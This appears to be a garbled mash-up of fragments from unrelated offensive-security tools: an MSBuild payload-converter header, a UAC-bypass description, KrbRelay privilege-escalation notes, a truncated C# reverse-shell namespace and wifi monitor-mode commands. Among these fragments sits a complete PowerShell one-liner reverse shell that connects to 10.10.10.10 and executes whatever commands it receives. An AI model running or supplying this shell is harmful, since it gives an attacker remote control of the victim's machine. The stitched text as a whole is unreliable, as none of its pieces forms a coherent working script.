#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#
# Requirements:
# - pefile
#
# Mariusz B. / mgeeky, <[email protected]>
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# put your network device into monitor mode
# Turn off interface (set interface down)
sudo ip link set wlan0 down
# Set monitor mode (needs root, like the other commands)
sudo iwconfig wlan0 mode monitor
# Turn up interface
sudo ip link set wlan0 up
namespace RevShell
{
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
namespace ConnectBack
<#
.Author:
@r00t-3xp10it - version 1.2
.Disclosure:
@mattharr0ey
https://medium.com/@mattharr0ey/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b
.DESCRIPTION:
How does the Slui UAC bypass work? There is a tool named ChangePK in System32 that has a service that opens a window (for you)
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
### Original script and research by commial
### https://github.com/commial/experiments/tree/master/windows-defender
### Set LUADec_Path to binary
### https://github.com/viruscamp/luadec
import struct
import argparse
import sys
import os
import io
import subprocess